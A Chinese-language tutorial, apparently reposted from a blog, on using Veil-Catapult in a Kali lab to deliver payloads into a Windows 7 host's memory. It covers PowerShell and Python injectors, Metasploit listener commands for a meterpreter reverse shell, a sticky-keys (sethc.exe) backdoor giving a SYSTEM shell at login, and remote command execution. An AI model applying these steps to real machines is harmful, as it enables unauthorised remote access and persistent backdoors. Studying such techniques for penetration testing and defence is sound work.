veil-catapult

Posted pyqb

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了veil-catapult相关的知识,希望对你有一定的参考价值。

veil-catapult进行payload投放,直接使payload在内存中执行。

kaliIP:192.168.1.119

目标IP:192.168.1.121

 

1、powershell

powershell工作原理:从kali先发一个powershell脚本到目标主机上,再发一个反弹shell到目标主机,再发一个指令给powershell,powershell通知反弹shell连接kali,之后就建立连接了

缺点:兼容性较差

veil-catapult 运行

通常选1、2,如果使用标准的payload就选1,已经想使用自己的payload就选2。

这里选1

先生成powershell

选1

在win7上是有powershell的运行环境的,直接在运行输入powershell

设置IP,目标用户名密码,执行形式

回车

生成反弹shell的payload

选1

设置反弹的IP,端口

然后就生成好了,生成的payload并没有保存到本地,而是存在内存中,回车注入到目标主机的内存中,使目标主机反弹连接到kali

但是kali并没有打开侦听,所以并没有连接成功,所以我们先打开msf的侦听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

 设置反弹的IP,和端口,以线程的注入方式

set lport 4444

set lhost 192.168.1.119

set EXITFUNC thread

show options

exploit执行侦听

msf执行侦听后,再对目标按照以上步骤进行payload投放

 

2、barehones python injector

通用性较好

打开msf进行侦听,veil-catapult运行,选1

选择2,barehones python injector

设置IP,目标用户名密码,执行形式

生成反弹shell的payload,选1

设置反弹的IP,端口

然后就生成好了,生成的payload并没有保存到本地,而是存在内存中,回车注入到目标主机的内存中,使目标主机反弹连接到kali

msf就侦听到了连接的信息,就可以看到session建立了

查看这个session信息,这个session的id号是1

进入到这个session

sessions -i 1

查看ip地址

就会看到ip是目标主机的ip

查看uip,和pid,可以看到pid是2716

在目标主机上打开任务管理器,可以看到2716的进程是python.exe,而且是system权限

进入shell

 

3、sethc backdoor

这次利用的是粘滞键的sethc.exe进程,连续点击5次shift键就会弹出粘滞键功能窗口,在登录页面这个功能依然有效,如下

而veil-catapult的sethc backdoor功能是将sethc.exe进程替换成cmd.exe进程,注入之后连按5次shift键就会弹出cmd窗口

veil-catapult运行,选1

选3

设置IP,目标用户名密码,执行形式

 

回车

回到目标主机的登录页面,连续按5次shift键弹出的就是cmd窗口了

 由于是system权限,可以进行任何操作,甚至修改密码

 

 

4、execute custom command

veil-catapult运行,选1

设置IP,目标用户名密码,执行形式

 让目标主机后台重复执行这条命令,不断地ping 192.168.1.119,可以用来当做僵尸攻击机

 

 

 

 

 

 

 

 

 

 

veil-catapult运行,选2的话是调用veil-evasion模块生成免杀payload

 

以上是关于veil-catapult的主要内容,如果未能解决你的问题,请参考以下文章